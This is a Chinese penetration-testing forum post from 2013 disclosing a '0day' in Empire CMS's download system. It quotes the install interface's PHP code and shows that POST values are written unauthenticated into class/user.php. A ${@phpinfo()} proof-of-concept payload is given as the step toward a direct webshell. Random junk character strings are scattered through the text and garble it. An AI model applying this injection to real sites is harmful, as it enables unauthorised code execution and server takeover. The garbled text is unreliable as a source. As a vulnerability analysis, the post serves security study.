中国网络渗透测试联盟

标题: 帝国万能接口漏洞0day [打印本页]

作者: admin 时间: 2013-1-23 09:34
标题: 帝国万能接口漏洞0day
这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们+ E" l! {3 ]6 k* v3 b4 _; R3 G0 I' f

7 `0 X7 N, M  M0 ~0 o  D* |

2 A$ t4 [* I' W4 H这是帝国的一套下载系统如图
3 F; f6 U, E. I( M/ o$ z4 L$ m' A  |ps(不需要任何账户和密码，直接写shell)

7 J& C8 _& x! d" f* I
由于很多站是由于下载要整合discuz 等等一些论坛..../ z0 W1 f) e5 R

& T- v. }# J7 g/ [而帝国他又有一个万能接口，如图

- ]( X2 j4 [; U2 T3 j[attach]170[/attach]8 N( H3 ~  Z- r8 I3 e. {
" y' J% h6 l* r4 O- ~
而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码
: i! w7 I- O# f& i4 K- \% h, J) ?7 H& V/ N, x) ~: V5 @0 ]
当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪; I( b1 |  b% z

, w* V: \* D$ @2 \在data/fun.php中的15行! t- X# \, [- F
" ^7 ~- W8 J8 S
我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {& a* [& l7 f9 _, y1 p

17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干7 v7 a1 Q% u( [2 X0 F* o5 E5 r

1 C: W4 O) h; i) c! C$ W+ H这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
0 Y& [, F( A0 {
. H( J/ Q, r2 T: C2 E& F他将传进来的变量进行了切割，然后赋给了$filetext
) G, _/ Q2 Y# Y6 s$ \/ ]5 J
- Q  h0 L% \/ X& D% Y# c5 U然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了7 @2 _! z# q4 U7 r- T

3 B4 Q, X( q' _我们看看写入的结果，随便填一个
3 {4 J3 `, Y" w9 A7 `0 C! G! g
[attach]171[/attach]
3 x& x, `0 r9 Y( `& C- [+ o) b9 E" S4 f' m
3 g3 p9 i2 k! R8 v, w+ Z* m
[attach]172[/attach]5 J! j/ |( S% j1 j) h4 o. T
: `* `/ C' Q4 J9 T& E; n& o/ E- X1 t
" Y! y5 }2 h% U, i( X
# S; ^9 {- K$ E& z2 Y

3 ?) k4 l. o3 M7 n+ F1 @2 q# L, e5 z& c$ q, f5 i5 D# Z0 K' G
/ k! g( F5 v5 |( ^$ a
# m6 B$ \9 Z3 P

) g/ E; |2 p7 {& ?/ v8 u% w" |" U7 u, K
[attach]173[/attach]
2 L; h9 ?9 x7 h' Y: Y2 d/ X4 M) R# r- @1 \
! r; A: @; ^6 O3 Q

3 O" J1 X$ w5 {, d1 s% R% I9 R$ h$ E  |  Q- O

[attach]174[/attach]2 E: ^8 I, w* l, f8 L( T% [
5 H1 c  q* t5 {3 ]
所以我们淫荡点，写个${@phpinfo()}试试
; X* K! M' d/ X: x

然后访问以下class/user.php这个文件
: h8 j* E2 }5 j7 O  |/ U. ?日了吧
$ P2 h- z& V9 Q, c  V  _3 D: g

4 l+ V5 {# O6 B; ^3 }9 Z
1 i; T4 U. @) v; U% v1 o( R& G" z2 Y+ i/ e/ r6 D7 o3 w
, }* B* [: i2 o" o1 ?# d

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)